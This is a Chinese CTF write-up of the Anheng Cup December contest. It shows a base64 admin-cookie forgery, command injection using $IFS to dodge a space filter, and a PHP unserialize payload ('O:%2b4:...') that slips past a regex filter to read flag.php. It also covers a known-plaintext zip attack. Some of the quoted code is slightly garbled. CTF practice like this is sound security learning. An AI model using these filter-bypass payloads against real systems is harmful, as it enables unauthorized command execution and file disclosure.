安恒杯12月月赛

WEB

   这次的月赛可以说非常适合我这种菜鸡做了

ezweb2:

请求包中发现一个user=base64

解码得到user,构造admin 然后base64提交

发现跳转到后台admin.php

试了一个ls发现有回显,应该是个命令执行漏洞

构造: cmd = ls$IFS/ 成功回显

然后读取flag: cmd = cat $IFS /ffLAG_404

easy:

file)) 
        {
            $filename = "./{$this->file}";        
            if (file_get_contents($filename))         
            {              
                return file_get_contents($filename); 
            } 
        }     
    }  
}  
if (isset($_GET['data']))  
{ 
    $data = $_GET['data'];
    preg_match('/[oc]:\d+:/i',$data,$matches);
    if(count($matches))
    {
        die('Hacker!');
    }
    else
    {
        $good = unserialize($data);
        echo $good;
    }     
} 
else 
{ 
    highlight_file("./index.php"); 
} 
?> 

本地构造序列化
O:4:“baby”:1:{s:4:“file”;s:8:“flag.php”;}

因为存在过滤出语句
preg_match(’/[oc]:\d+:/i’, d a t a , data, data,matches);

所以需要绕过,用加号进行绕过:
O:+4:“baby”:1:{s:4:“file”;s:8:“flag.php”;}

但如果直接传值的话会,服务器接收到会把加号认为空格,所以要对加号url编码:
O:%2b4:“baby”:1:{s:4:“file”;s:8:“flag.php”;}

MISC

JUJU

提示女朋友问我这11只JUJU哪只好看?
图片里没有11只JUJU,用windex改个高度即可
然后base32解码得到flag

学习资料

zip加密,一般zip加密只有那几种,并且打开zip文件里面还有一个已经给出的txt文件,还有一个经过加密的zip文件,很明显是明文攻击就可以了
将txt文件加密为zip文件,然后用ARCHPR进行明文攻击
得到一个doc文件打开,得到一个5 3 的图片,把图片移开就可以看到flag了

你可能感兴趣的:(CTFwrite,ctf,安恒杯)